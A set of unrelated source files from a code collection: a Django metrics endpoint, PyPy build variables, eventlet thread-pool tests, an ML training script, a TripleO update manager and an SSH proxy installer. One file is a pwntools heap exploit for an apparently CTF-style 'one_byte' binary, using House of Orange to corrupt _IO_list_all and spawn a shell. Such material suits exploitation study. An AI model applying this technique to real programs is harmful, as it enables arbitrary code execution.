ctx['ticket_stats'] = []
for d in self.get_ticket_stats(self.request.event):
qs = list(d['qs'].order_by().values('subevent', 'item').annotate(c=Count('*')))
if d.get('qs_cliq'):
qsc = list(d['qs'].order_by().values('subevent', 'has_clique').annotate(c=Count('*'), cc=Count('order__orderclique__clique', distinct=True)))
c1 = qs_by_clique(qsc)
c2 = qs_by_unique_clique(qsc)
else:
c1 = c2 = None
ctx['ticket_stats'].append((
d['label'],
qs_by_item(qs),
qs_by_subevent(qs),
c1,
c2
))
return ctx
class MetricsView(StatsMixin, View):
@scopes_disabled()
def get(self, request, organizer, event):
event = get_object_or_404(Event, slug=event, organizer__slug=organizer)
if not settings.METRICS_ENABLED:
return unauthed_response()
# check if the user is properly authorized:
if "Authorization" not in request.headers:
return unauthed_response()
method, credentials = request.headers["Authorization"].split(" ", 1)
if method.lower() != "basic":
return unauthed_response()
user, passphrase = base64.b64decode(credentials.strip()).decode().split(":", 1)
if not hmac.compare_digest(user, settings.METRICS_USER):
return unauthed_response()
if not hmac.compare_digest(passphrase, settings.METRICS_PASSPHRASE):
return unauthed_response()
# ok, the request passed the authentication-barrier, let's hand out the metrics:
m = defaultdict(dict)
for d in self.get_ticket_stats(event):
if d.get('qs_cliq'):
qs = d['qs'].order_by().values('subevent', 'item', 'has_clique').annotate(c=Count('*'), cc=Count('order__orderclique__clique', distinct=True))
for r in qs:
m[d['id']]['{item="%s",subevent="%s",hasclique="%s"}' % (r['item'], r['subevent'], r['has_clique'])] = r['c']
if r['cc']:
m[d['id'] + '_unique_cliques']['{item="%s",subevent="%s"}' % (r['item'], r['subevent'])] = r['cc']
else:
qs = d['qs'].order_by().values('subevent', 'item').annotate(c=Count('*'))
for r in qs:
m[d['id']]['{item="%s",subevent="%s"}' % (r['item'], r['subevent'])] = r['c']
output = []
for metric, sub in m.items():
for label, value in sub.items():
output.append("{}{} {}".format(metric, label, str(value)))
content = "\n".join(output) + "\n"
return HttpResponse(content)
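# A hedged sketch of scraping this endpoint. The URL and the requests-style
# `session` object are assumptions; only the Basic-Auth check and the
# 'metric{labels} value' line format come from the view above.
def _example_metrics_scrape(session, metrics_url, user, passphrase):
    response = session.get(metrics_url, auth=(user, passphrase))  # HTTP Basic auth
    # Each line looks like: tickets_paid{item="12",subevent="3"} 7
    return dict(line.rsplit(" ", 1) for line in response.text.splitlines())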
|
the-stack_0_25250
|
import _imp
import os
import sys
import struct
from shutil import which
so_ext = _imp.extension_suffixes()[0]
pydot = '%d.%d' % sys.version_info[:2]
build_time_vars = {
'ABIFLAGS': '',
# SOABI is PEP 3149 compliant, but CPython3 has so_ext.split('.')[1]
# ("ABI tag"-"platform tag") where this is ABI tag only. Wheel 0.34.2
# depends on this value, so don't make it CPython compliant without
# checking wheel: it uses pep425tags.get_abi_tag with special handling
# for CPython
"SOABI": '-'.join(so_ext.split('.')[1].split('-')[:2]),
"SO": so_ext, # deprecated in Python 3, for backward compatibility
'MULTIARCH': sys.implementation._multiarch,
'CC': "cc -pthread",
'CXX': "c++ -pthread",
'OPT': "-DNDEBUG -O2",
'CFLAGS': "-DNDEBUG -O2",
'CCSHARED': "-fPIC",
'LDFLAGS': "-Wl,-Bsymbolic-functions",
'LDSHARED': "cc -pthread -shared -Wl,-Bsymbolic-functions",
'EXT_SUFFIX': so_ext,
'SHLIB_SUFFIX': ".so",
'AR': "ar",
'ARFLAGS': "rc",
'EXE': "",
'VERSION': pydot,
'LDVERSION': pydot,
'Py_DEBUG': 0, # cpyext never uses this
'Py_ENABLE_SHARED': 0, # if 1, will add python so to link like -lpython3.7
'SIZEOF_VOID_P': struct.calcsize("P"),
}
# LIBDIR should point to where the libpypy3.9-c.so file lives, on CPython
# it points to "mybase/lib". But that would require rethinking the PyPy
# packaging process which copies pypy3 and libpypy3.9-c.so to the
# "mybase/bin" directory. Only when making a portable build (the default
# for the linux buildbots) is there even a "mybase/lib" created, and even then
# the mybase/bin layout is left untouched.
mybase = sys.base_prefix
if sys.platform == 'win32':
build_time_vars['LDLIBRARY'] = 'libpypy3.9-c.dll'
build_time_vars['INCLUDEPY'] = os.path.join(mybase, 'include')
build_time_vars['LIBDIR'] = mybase
else:
build_time_vars['LDLIBRARY'] = 'libpypy3.9-c.so'
build_time_vars['INCLUDEPY'] = os.path.join(mybase, 'include', 'pypy' + pydot)
build_time_vars['LIBDIR'] = os.path.join(mybase, 'bin')
# try paths relative to sys.base_prefix first
tzpaths = [
os.path.join(mybase, 'share', 'zoneinfo'),
os.path.join(mybase, 'lib', 'zoneinfo'),
os.path.join(mybase, 'share', 'lib', 'zoneinfo'),
os.path.join(mybase, '..', 'etc', 'zoneinfo'),
]
# add absolute system paths if sys.base_prefix != "/usr"
# (otherwise we would just be adding duplicates)
if mybase != '/usr':
tzpaths.extend([
'/usr/share/zoneinfo',
'/usr/lib/zoneinfo',
'/usr/share/lib/zoneinfo',
'/etc/zoneinfo',
])
build_time_vars['TZPATH'] = ':'.join(tzpaths)
if which("gcc"):
build_time_vars.update({
"CC": "gcc -pthread",
"GNULD": "yes",
"LDSHARED": "gcc -pthread -shared" + " " + build_time_vars["LDFLAGS"] ,
})
if which("g++"):
build_time_vars["CXX"] = "g++ -pthread"
if sys.platform[:6] == "darwin":
# Fix this if we ever get M1 support
arch = 'x86_64'
build_time_vars['CC'] += ' -arch %s' % (arch,)
build_time_vars["LDFLAGS"] = "-undefined dynamic_lookup"
build_time_vars["LDSHARED"] = build_time_vars['CC'] + " -shared " + build_time_vars["LDFLAGS"]
build_time_vars['LDLIBRARY'] = 'libpypy3.9-c.dylib'
# scikit-build checks this; it is left over from the NeXTSTEP rld linker
build_time_vars['WITH_DYLD'] = 1
if "CXX" in build_time_vars:
build_time_vars['CXX'] += ' -arch %s' % (arch,)
# This was added to solve problems that may have been
# solved elsewhere. Can we remove it? See cibuildwheel PR 185 and
# pypa/wheel. Need to check: interaction with build_cffi_imports.py
#
# In any case, keep this in sync with DARWIN_VERSION_MIN in
# rpython/translator/platform/darwin.py and Lib/_osx_support.py
build_time_vars['MACOSX_DEPLOYMENT_TARGET'] = '10.9'
|
the-stack_0_25251
|
#!/usr/bin/python3
from pwn import *
elf = context.binary = ELF("one_byte")
libc = elf.libc
gs = '''
continue
'''
def start():
if args.GDB:
return gdb.debug(elf.path, gdbscript=gs)
else:
return process(elf.path)
# Index of allocated chunks.
index = 0
# Select the "malloc" option.
# Returns chunk index.
def malloc():
global index
io.sendthen("> ", "1")
index += 1
return index - 1
# Select the "free" option; send index.
def free(index):
io.send("2")
io.sendafter("index: ", f"{index}")
io.recvuntil("> ")
# Select the "edit" option; send index & data.
def edit(index, data):
io.send("3")
io.sendafter("index: ", f"{index}")
io.sendafter("data: ", data)
io.recvuntil("> ")
# Select the "read" option; read 0x58 bytes.
def read(index):
io.send("4")
io.sendafter("index: ", f"{index}")
r = io.recv(0x58)
io.recvuntil("> ")
return r
io = start()
io.recvuntil("> ")
io.timeout = 0.1
# =============================================================================
# Request 5 chunks
chunk_A = malloc()
chunk_B = malloc()
chunk_C = malloc()
chunk_D = malloc()
chunk_E = malloc()
# Edit chunk A to overwrite the size field of chunk B
edit(chunk_A, b"Y"*0x58 + p64(0x60 * 2 + 0x1))
# Free chunk B into the unsortedbin (0xc0 size)
free(chunk_B)
# Allocate a 0x60-sized chunk. This will split chunk B in half
# due to the remaindering process.
# The allocated chunk will be placed right after chunk A but before
# our unsortedbin'ed chunk B.
chunk_B = malloc()
# The unsortedbin'ed half of chunk B has become chunk C.
# Now we can read its fd and bk pointers (which point into the unsortedbin),
# effectively leaking a libc address.
unsortedbin_address = u64(read(chunk_C)[:8])
unsortedbin_libc_offset = libc.sym.main_arena + 88
libc.address = unsortedbin_address - unsortedbin_libc_offset
log.info(f"libc @ {hex(libc.address)}")
# Request unsortedbin'ed half of chunk B
chunk_C2 = malloc()
# Put chunk A into the fastbin
free(chunk_A)
# Put chunk C2 into the fastbin
free(chunk_C2)
# Chunk C2 now has an fd pointing to the start of chunk A,
# which is also the heap start address.
# We can read chunk C2 using chunk C to leak it.
heap = u64(read(chunk_C)[:8])
log.info(f"heap @ {hex(heap)}")
# Revert the heap to its initial state
chunk_C = malloc()
chunk_A = malloc()
# =============================================================================
# Edit chunk A to overwrite the size field of chunk B
edit(chunk_A, b"Y"*0x58 + p64(0x60 * 2 + 0x1))
# Free chunk B into the unsortedbin (0xc0 size)
free(chunk_B)
# Remainder chunk B again
chunk_B = malloc()
# The unsortedbin'ed half of chunk B has become chunk C.
# Now we can leverage the House of Orange technique.
# 0xb1 = 0xb0 (a smallbin size that _IO_list_all targets) + the prev_inuse flag
# (determined from the main arena layout).
edit(chunk_B, p64(0) * 10 + b"/bin/sh\x00" + p8(0xb1))
edit(chunk_C, p64(0xdeadbeef) + p64(libc.sym._IO_list_all - 0x10) + p64(1) + p64(2))
# chunk D is null, so the mode is already set to 0
edit(chunk_E, p64(libc.sym.system) + p64(heap + 0x178))
# Check:
# pwndbg> p (struct _IO_FILE_plus) *0x5555557570c0
# pwndbg> p *$1.vtable
# Trigger the attack
malloc()
# =============================================================================
io.interactive()
|
the-stack_0_25252
|
# Copyright (c) 2007, Linden Research, Inc.
# Copyright (c) 2007, IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import gc
import random
import re
import time
import eventlet
from eventlet import tpool
import six
import tests
one = 1
two = 2
three = 3
none = None
def noop():
pass
def raise_exception():
raise RuntimeError("hi")
class TestTpool(tests.LimitedTestCase):
def setUp(self):
super(TestTpool, self).setUp()
def tearDown(self):
tpool.killall()
super(TestTpool, self).tearDown()
@tests.skip_with_pyevent
def test_wrap_tuple(self):
my_tuple = (1, 2)
prox = tpool.Proxy(my_tuple)
self.assertEqual(prox[0], 1)
self.assertEqual(prox[1], 2)
self.assertEqual(len(my_tuple), 2)
@tests.skip_with_pyevent
def test_wrap_string(self):
my_object = "whatever"
prox = tpool.Proxy(my_object)
self.assertEqual(str(my_object), str(prox))
self.assertEqual(len(my_object), len(prox))
self.assertEqual(my_object.join(['a', 'b']), prox.join(['a', 'b']))
@tests.skip_with_pyevent
def test_wrap_uniterable(self):
prox = tpool.Proxy([])
def index():
prox[0]
def key():
prox['a']
self.assertRaises(IndexError, index)
self.assertRaises(TypeError, key)
@tests.skip_with_pyevent
def test_wrap_dict(self):
my_object = {'a': 1}
prox = tpool.Proxy(my_object)
self.assertEqual('a', list(prox.keys())[0])
self.assertEqual(1, prox['a'])
self.assertEqual(str(my_object), str(prox))
self.assertEqual(repr(my_object), repr(prox))
@tests.skip_with_pyevent
def test_wrap_module_class(self):
prox = tpool.Proxy(re)
self.assertEqual(tpool.Proxy, type(prox))
exp = prox.compile('(.)(.)(.)')
self.assertEqual(exp.groups, 3)
assert repr(prox.compile)
@tests.skip_with_pyevent
def test_wrap_eq(self):
prox = tpool.Proxy(re)
exp1 = prox.compile('.')
exp2 = prox.compile(exp1.pattern)
self.assertEqual(exp1, exp2)
exp3 = prox.compile('/')
assert exp1 != exp3
@tests.skip_with_pyevent
def test_wrap_ints(self):
p = tpool.Proxy(4)
assert p == 4
@tests.skip_with_pyevent
def test_wrap_hash(self):
prox1 = tpool.Proxy('' + 'A')
prox2 = tpool.Proxy('A' + '')
assert prox1 == 'A'
assert 'A' == prox2
# assert prox1 == prox2 FIXME - could __eq__ unwrap rhs if it is other proxy?
self.assertEqual(hash(prox1), hash(prox2))
proxList = tpool.Proxy([])
self.assertRaises(TypeError, hash, proxList)
@tests.skip_with_pyevent
def test_wrap_nonzero(self):
prox = tpool.Proxy(re)
exp1 = prox.compile('.')
assert bool(exp1)
prox2 = tpool.Proxy([1, 2, 3])
assert bool(prox2)
@tests.skip_with_pyevent
def test_multiple_wraps(self):
prox1 = tpool.Proxy(re)
prox2 = tpool.Proxy(re)
prox1.compile('.')
x2 = prox1.compile('.')
del x2
prox2.compile('.')
@tests.skip_with_pyevent
def test_wrap_getitem(self):
prox = tpool.Proxy([0, 1, 2])
self.assertEqual(prox[0], 0)
@tests.skip_with_pyevent
def test_wrap_setitem(self):
prox = tpool.Proxy([0, 1, 2])
prox[1] = 2
self.assertEqual(prox[1], 2)
@tests.skip_with_pyevent
def test_wrap_iterator(self):
self.reset_timeout(2)
prox = tpool.Proxy(range(10))
result = []
for i in prox:
result.append(i)
self.assertEqual(list(range(10)), result)
@tests.skip_with_pyevent
def test_wrap_iterator2(self):
self.reset_timeout(5) # might take a while due to imprecise sleeping
def foo():
import time
for x in range(2):
yield x
time.sleep(0.001)
counter = [0]
def tick():
for i in six.moves.range(20000):
counter[0] += 1
if counter[0] % 20 == 0:
eventlet.sleep(0.0001)
else:
eventlet.sleep()
gt = eventlet.spawn(tick)
previtem = 0
for item in tpool.Proxy(foo()):
assert item >= previtem
# make sure the tick happened at least a few times so that we know
# that our iterations in foo() were actually tpooled
assert counter[0] > 10, counter[0]
gt.kill()
@tests.skip_with_pyevent
def test_raising_exceptions(self):
prox = tpool.Proxy(re)
def nofunc():
prox.never_name_a_function_like_this()
self.assertRaises(AttributeError, nofunc)
from tests import tpool_test
prox = tpool.Proxy(tpool_test)
self.assertRaises(RuntimeError, prox.raise_exception)
@tests.skip_with_pyevent
def test_variable_and_keyword_arguments_with_function_calls(self):
import optparse
parser = tpool.Proxy(optparse.OptionParser())
parser.add_option('-n', action='store', type='string', dest='n')
opts, args = parser.parse_args(["-nfoo"])
self.assertEqual(opts.n, 'foo')
@tests.skip_with_pyevent
def test_contention(self):
from tests import tpool_test
prox = tpool.Proxy(tpool_test)
pile = eventlet.GreenPile(4)
pile.spawn(lambda: self.assertEqual(prox.one, 1))
pile.spawn(lambda: self.assertEqual(prox.two, 2))
pile.spawn(lambda: self.assertEqual(prox.three, 3))
results = list(pile)
self.assertEqual(len(results), 3)
@tests.skip_with_pyevent
def test_timeout(self):
blocking = eventlet.patcher.original('time')
eventlet.Timeout(0.1, eventlet.Timeout())
try:
tpool.execute(blocking.sleep, 0.3)
assert False, 'Expected Timeout'
except eventlet.Timeout:
pass
@tests.skip_with_pyevent
def test_killall(self):
tpool.killall()
tpool.setup()
@tests.skip_with_pyevent
def test_killall_remaining_results(self):
semaphore = eventlet.Event()
def native_fun():
time.sleep(.5)
def gt_fun():
semaphore.send(None)
tpool.execute(native_fun)
gt = eventlet.spawn(gt_fun)
semaphore.wait()
tpool.killall()
gt.wait()
@tests.skip_with_pyevent
def test_autowrap(self):
x = tpool.Proxy({'a': 1, 'b': 2}, autowrap=(int,))
assert isinstance(x.get('a'), tpool.Proxy)
assert not isinstance(x.items(), tpool.Proxy)
# attributes as well as callables
from tests import tpool_test
x = tpool.Proxy(tpool_test, autowrap=(int,))
assert isinstance(x.one, tpool.Proxy)
assert not isinstance(x.none, tpool.Proxy)
@tests.skip_with_pyevent
def test_autowrap_names(self):
x = tpool.Proxy({'a': 1, 'b': 2}, autowrap_names=('get',))
assert isinstance(x.get('a'), tpool.Proxy)
assert not isinstance(x.items(), tpool.Proxy)
from tests import tpool_test
x = tpool.Proxy(tpool_test, autowrap_names=('one',))
assert isinstance(x.one, tpool.Proxy)
assert not isinstance(x.two, tpool.Proxy)
@tests.skip_with_pyevent
def test_autowrap_both(self):
from tests import tpool_test
x = tpool.Proxy(tpool_test, autowrap=(int,), autowrap_names=('one',))
assert isinstance(x.one, tpool.Proxy)
# violating the abstraction to check that we didn't double-wrap
assert not isinstance(x._obj, tpool.Proxy)
@tests.skip_with_pyevent
def test_callable(self):
def wrapped(arg):
return arg
x = tpool.Proxy(wrapped)
self.assertEqual(4, x(4))
# verify that it wraps return values if specified
x = tpool.Proxy(wrapped, autowrap_names=('__call__',))
assert isinstance(x(4), tpool.Proxy)
self.assertEqual("4", str(x(4)))
@tests.skip_with_pyevent
def test_callable_iterator(self):
def wrapped(arg):
yield arg
yield arg
yield arg
x = tpool.Proxy(wrapped, autowrap_names=('__call__',))
for r in x(3):
self.assertEqual(3, r)
@tests.skip_with_pyevent
def test_eventlet_timeout(self):
def raise_timeout():
raise eventlet.Timeout()
self.assertRaises(eventlet.Timeout, tpool.execute, raise_timeout)
@tests.skip_with_pyevent
def test_tpool_set_num_threads(self):
tpool.set_num_threads(5)
self.assertEqual(5, tpool._nthreads)
class TpoolLongTests(tests.LimitedTestCase):
TEST_TIMEOUT = 60
@tests.skip_with_pyevent
def test_a_buncha_stuff(self):
assert_ = self.assert_
class Dummy(object):
def foo(self, when, token=None):
assert_(token is not None)
time.sleep(random.random() / 200.0)
return token
def sender_loop(loopnum):
obj = tpool.Proxy(Dummy())
count = 100
for n in six.moves.range(count):
eventlet.sleep(random.random() / 200.0)
now = time.time()
token = loopnum * count + n
rv = obj.foo(now, token=token)
self.assertEqual(token, rv)
eventlet.sleep(random.random() / 200.0)
cnt = 10
pile = eventlet.GreenPile(cnt)
for i in six.moves.range(cnt):
pile.spawn(sender_loop, i)
results = list(pile)
self.assertEqual(len(results), cnt)
tpool.killall()
@tests.skip_with_pyevent
def test_leakage_from_tracebacks(self):
tpool.execute(noop) # get it started
gc.collect()
initial_objs = len(gc.get_objects())
for i in range(10):
self.assertRaises(RuntimeError, tpool.execute, raise_exception)
gc.collect()
middle_objs = len(gc.get_objects())
# some objects will inevitably be created by the previous loop
# now we test to ensure that running the loop an order of
# magnitude more doesn't generate additional objects
for i in six.moves.range(100):
self.assertRaises(RuntimeError, tpool.execute, raise_exception)
first_created = middle_objs - initial_objs
gc.collect()
second_created = len(gc.get_objects()) - middle_objs
self.assert_(second_created - first_created < 10,
"first loop: %s, second loop: %s" % (first_created,
second_created))
tpool.killall()
def test_isolate_from_socket_default_timeout():
tests.run_isolated('tpool_isolate_socket_default_timeout.py', timeout=5)
def test_exception_leak():
tests.run_isolated('tpool_exception_leak.py')
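# A minimal sketch of the tpool API exercised above: execute() runs a blocking
# callable in a native worker thread, Proxy() wraps an object so attribute
# access and calls are dispatched the same way. Values here are illustrative.
def _example_tpool_usage():
    blocking_time = eventlet.patcher.original('time')  # the unpatched time module
    tpool.execute(blocking_time.sleep, 0.1)            # blocks a worker thread, not the hub
    proxied = tpool.Proxy({"a": 1})                    # dict method calls go via the pool
    return proxied.get("a")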
|
the-stack_0_25253
|
import json
import logging
import os
import sys
import shutil
import argparse
import numpy as np
import pandas as pd
import urllib3
from influxdb import InfluxDBClient
dir_path = os.path.dirname(os.path.realpath(__file__))
path_parent = os.path.dirname(dir_path)
sys.path.insert(0, path_parent)
from classes.artificial_features import ArtificialFeatures
from classes.features_analyzer import FeaturesAnalyzer
from classes.inputs_gatherer import InputsGatherer
from classes.grid_searcher import GridSearcher
from classes.model_trainer import ModelTrainer
urllib3.disable_warnings()
if __name__ == "__main__":
# --------------------------------------------------------------------------- #
# Configuration file
# --------------------------------------------------------------------------- #
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument("-c", help="configuration file")
arg_parser.add_argument("-t", help="type (MOR | EVE)")
arg_parser.add_argument("-l", help="log file (optional, if empty log redirected on stdout)")
args = arg_parser.parse_args()
# Load the main parameters
config_file = args.c
if os.path.isfile(config_file) is False:
print('\nATTENTION! Unable to open configuration file %s\n' % config_file)
sys.exit(1)
cfg = json.loads(open(args.c).read())
# Load the connections parameters and update the config dict with the related values
cfg_conns = json.loads(open(cfg['connectionsFile']).read())
cfg.update(cfg_conns)
# Define the forecast type
forecast_type = args.t
# --------------------------------------------------------------------------- #
# Set logging object
# --------------------------------------------------------------------------- #
if not args.l:
log_file = None
else:
log_file = args.l
logger = logging.getLogger()
logging.basicConfig(format='%(asctime)-15s::%(levelname)s::%(funcName)s::%(message)s', level=logging.INFO,
filename=log_file)
logger.info('Starting program')
logger.info('Connection to InfluxDb server on socket [%s:%s]' % (cfg['influxDB']['host'], cfg['influxDB']['port']))
try:
influx_client = InfluxDBClient(host=cfg['influxDB']['host'], port=cfg['influxDB']['port'],
password=cfg['influxDB']['password'], username=cfg['influxDB']['user'],
database=cfg['influxDB']['database'], ssl=cfg['influxDB']['ssl'])
except Exception as e:
logger.error('EXCEPTION: %s' % str(e))
sys.exit(3)
logger.info('Connection successful')
# --------------------------------------------------------------------------- #
# Test using regions
# --------------------------------------------------------------------------- #
AF = ArtificialFeatures(influx_client, forecast_type, cfg, logger)
IG = InputsGatherer(influx_client, forecast_type, cfg, logger, AF)
FA = FeaturesAnalyzer(IG, forecast_type, cfg, logger)
MT = ModelTrainer(FA, IG, forecast_type, cfg, logger)
GS = GridSearcher(FA, IG, MT, forecast_type, cfg, logger)
cfg['datasetSettings']['startDay'] = '07-10'
cfg['datasetSettings']['endDay'] = '07-20'
cfg['datasetSettings']['years'] = [2019]
cfg['datasetSettings']['datasetCreator'] = 'regions'
cfg['featuresAnalyzer']['performFeatureSelection'] = True
cfg['featuresAnalyzer']['numberSelectedFeatures'] = 10
# FA.dataset_creator()
FA.dataset_reader()
MT.train_final_models()
for region in cfg['regions']:
folder_path = IG.output_folder_creator(region)
os.remove(cfg['datasetSettings']['outputSignalFolder'] + region + '_signals.json')
try:
shutil.rmtree(folder_path)
except OSError as e:
logger.error("%s - %s." % (e.filename, e.strerror))
logger.info('Ending program')
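# For reference, a minimal sketch of the configuration this script expects.
# Key names are taken from the accesses above; every value is a placeholder,
# and the influxDB block may equally live in the separate connections file
# that gets merged into cfg at startup.
#
# {
#   "connectionsFile": "conf/conns.json",
#   "influxDB": {"host": "localhost", "port": 8086, "user": "...", "password": "...",
#                "database": "...", "ssl": true},
#   "datasetSettings": {"startDay": "07-10", "endDay": "07-20", "years": [2019],
#                       "datasetCreator": "regions", "outputSignalFolder": "..."},
#   "featuresAnalyzer": {"performFeatureSelection": true, "numberSelectedFeatures": 10},
#   "regions": ["..."]
# }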
|
the-stack_0_25254
|
# Copyright 2015 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import time
from heatclient.common import template_utils
from tripleo_common import _stack_update
from tripleo_common import constants
LOG = logging.getLogger(__name__)
def add_breakpoints_cleanup_into_env(env):
template_utils.deep_update(env, {
'resource_registry': {
'resources': {'*': {'*': {
constants.UPDATE_RESOURCE_NAME: {'hooks': []}}}}
}
})
class PackageUpdateManager(_stack_update.StackUpdateManager):
def __init__(self, heatclient, novaclient, stack_id, stack_fields):
stack = heatclient.stacks.get(stack_id)
self.stack_fields = stack_fields
super(PackageUpdateManager, self).__init__(
heatclient=heatclient, novaclient=novaclient, stack=stack,
hook_type='pre-update', nested_depth=5,
hook_resource=constants.UPDATE_RESOURCE_NAME)
def update(self, timeout_mins=constants.STACK_TIMEOUT_DEFAULT):
env = {}
if 'environment' in self.stack_fields:
env = self.stack_fields['environment']
template_utils.deep_update(env, {
'resource_registry': {
'resources': {
'*': {
'*': {
constants.UPDATE_RESOURCE_NAME: {
'hooks': 'pre-update'}
}
}
}
}
})
# time rounded to seconds
timestamp = int(time.time())
stack_params = {
'DeployIdentifier': timestamp,
'UpdateIdentifier': timestamp,
'StackAction': 'UPDATE'
}
template_utils.deep_update(env, {'parameter_defaults': stack_params})
self.stack_fields['environment'] = env
fields = {
'existing': True,
'stack_id': self.stack.id,
'template': self.stack_fields['template'],
'files': self.stack_fields['files'],
'environment': self.stack_fields['environment'],
'timeout_mins': timeout_mins,
'stack_name': self.stack_fields['stack_name'],
}
LOG.info('updating stack: %s', self.stack.stack_name)
LOG.debug('stack update params: %s', fields)
self.heatclient.stacks.update(**fields)
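# A hedged usage sketch; the client objects and stack fields are placeholders,
# only the constructor signature and the update() call mirror the class above.
#
#   manager = PackageUpdateManager(heatclient, novaclient, stack_id,
#                                  {'stack_name': 'overcloud',
#                                   'template': template,
#                                   'files': files,
#                                   'environment': env})
#   manager.update(timeout_mins=240)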
|
the-stack_0_25256
|
from sage.all import *
from gates import *
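# hash_Pauli3 folds an 8x8 matrix into one number by weighting entry k with 2**k
# (row-major order). For tensor products of Pauli matrices the entries lie in
# {0, 1, -1, i, -i}, so the value serves as a fingerprint that the `seen` table
# below uses to recognize Paulis up to the phases 1, -1, i, -i.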
def hash_Pauli3(p):
hash = 0
k = 0
for row in p:
for element in row:
hash += (2 ** k) * element
k += 1
return hash
if __name__ == "__main__":
CX01 = generate_CnX_gate(3, {2-0}, {2-1})
CX02 = generate_CnX_gate(3, {2-0}, {2-2})
CX12 = generate_CnX_gate(3, {2-1}, {2-2})
seen = {}
P3 = []
for A, a in zip([I, X, Y, Z], ["I", "X", "Y", "Z"]):
for B, b in zip([I, X, Y, Z], ["I", "X", "Y", "Z"]):
for C, c in zip([I, X, Y, Z], ["I", "X", "Y", "Z"]):
t = tensor3(A, B, C)
assert(not (hash_Pauli3(t) in seen))
seen[ 1 * hash_Pauli3(t)] = f" ({a} x {b} x {c})"
seen[-1 * hash_Pauli3(t)] = f" -({a} x {b} x {c})"
seen[ i * hash_Pauli3(t)] = f" i({a} x {b} x {c})"
seen[-i * hash_Pauli3(t)] = f"-i({a} x {b} x {c})"
P3.append(t)
#print(t)
#print(hash_Pauli3(t))
print(len(seen))
d_CCZ = CCZ.conjugate_transpose()
n = 0
for p in P3:
for p_prime in P3:
u = CCZ * p * d_CCZ
t = u * p_prime * u.conjugate_transpose()
h = hash_Pauli3(t)
assert(h in seen)
|
the-stack_0_25259
|
#
# This file is part of ravstack. Ravstack is free software available under
# the terms of the MIT license. See the file "LICENSE" that was provided
# together with this source file for the licensing terms.
#
# Copyright (c) 2015 the ravstack authors. See the file "AUTHORS" for a
# complete list.
from __future__ import absolute_import, print_function
import os
import shlex
import subprocess
import textwrap
import re
from . import util, factory, node, runtime
from .runtime import LOG, CONF
# proxy-create command
def create_ssh_keypair(keyname, comment):
"""Create a new ssh keypair."""
sshdir = os.path.join(util.get_homedir(), '.ssh')
util.create_directory(sshdir, 0o700)
keyfile = os.path.join(sshdir, keyname)
if util.try_stat(keyfile):
raise RuntimeError('~/.ssh/{} already exists'.format(keyname))
subprocess.check_call(['ssh-keygen', '-f', keyfile, '-N', "", '-q', '-C', comment])
os.chmod(keyfile, 0o600)
os.chmod(keyfile + '.pub', 0o644)
return keyfile
def create_proxy(proxyname):
"""Create a proxy wrapper."""
# Running in a software collection?
enable_scls = []
scls = os.environ.get('X_SCLS', '')
for scl in scls.split():
with open('/etc/scl/conf/{}'.format(scl)) as fin:
prefix = fin.readline().rstrip()
enable_scls.append('. {}/{}/enable'.format(prefix, scl))
if scls:
enable_scls.append('X_SCLS={}'.format(shlex.quote(scls)))
enable_scls.append('export X_SCLS')
else:
enable_scls.append('# No software collections enabled.')
enable_scls = '\n'.join(enable_scls)
# Running in a virtualenv?
venv = os.environ.get('VIRTUAL_ENV')
enable_venv = '. {}/bin/activate'.format(venv) if venv else '# No virtualenv enabled.'
# Create the ~/bin directory if needed
bindir = os.path.join(util.get_homedir(), 'bin')
proxyfile = os.path.join(bindir, proxyname)
util.create_directory(bindir, 0o755)
contents = textwrap.dedent("""\
#!/bin/sh
{}
{}
exec python -mravstack.proxy
""").format(enable_scls, enable_venv)
with open(proxyfile, 'w') as fout:
fout.write(contents)
os.chmod(proxyfile, 0o700)
return proxyfile
def install_proxy(pubkey, command):
"""Add a public key to the authorized_keys file."""
with open(pubkey) as fin:
keydata = fin.read()
sshdir = os.path.join(util.get_homedir(), '.ssh')
authentry = 'no-pty,no-port-forwarding,no-X11-forwarding,no-agent-forwarding'
authentry += ',command="{}",from="127.0.0.1,::1" '.format(command)
authentry += keydata
authfile = os.path.join(sshdir, 'authorized_keys')
with open(authfile, 'a') as fout:
fout.write(authentry)
os.chmod(authfile, 0o600)
def test_proxy(keyfile):
"""Test the proxy."""
# This also has the benefit that the host key is added to the known hosts file.
subprocess.check_call(['ssh', '-q', '-o', 'StrictHostKeyChecking=no', '-i', keyfile,
'localhost', 'true'])
def do_create(env):
"""The `ravstack proxy-create` command."""
keyname = env.config['proxy']['key_name']
proxyname = env.config['proxy']['proxy_name']
keyfile = create_ssh_keypair(keyname, proxyname)
proxyfile = create_proxy(proxyname)
install_proxy(keyfile + '.pub', proxyfile)
test_proxy(keyfile)
print('Private key created as: `~/.ssh/{}`.'.format(keyname))
print('Proxy created at: `~/bin/{}`.'.format(proxyname))
# proxy-run command
# These are the virsh commands used by the ssh power driver in Ironic.
# They need to match and be kept up to date with the following file:
# https://github.com/openstack/ironic/blob/master/ironic/drivers/modules/ssh.py#L151
_virsh_commands = [
('true', re.compile('^true$')),
('start', re.compile(' start ([^ ]+)')),
('stop', re.compile(' destroy ([^ ]+)')),
('reboot', re.compile(' reset ([^ ]+)')),
('get_node_macs', re.compile(' dumpxml ([^ ]+) .*mac')),
('list_running', re.compile(' list --all.*running')),
('list_all', re.compile(' list --all')),
('get_boot_device', re.compile(' dumpxml ([^ ]+) .*boot')),
('set_boot_device', re.compile(r'boot dev=\\"([^\\]+)\\".* edit ([^ ]+)')),
]
def parse_virsh_command_line(command):
"""Parse the virsh command line.
The proxy script is run as a forced command specified in an ssh private
key. The original command is available in the $SSH_ORIGINAL_COMMAND
environment variable.
"""
for cmd, regex in _virsh_commands:
match = regex.search(command)
if match:
return (cmd,) + match.groups()
raise RuntimeError('unrecognized command: {}'.format(command))
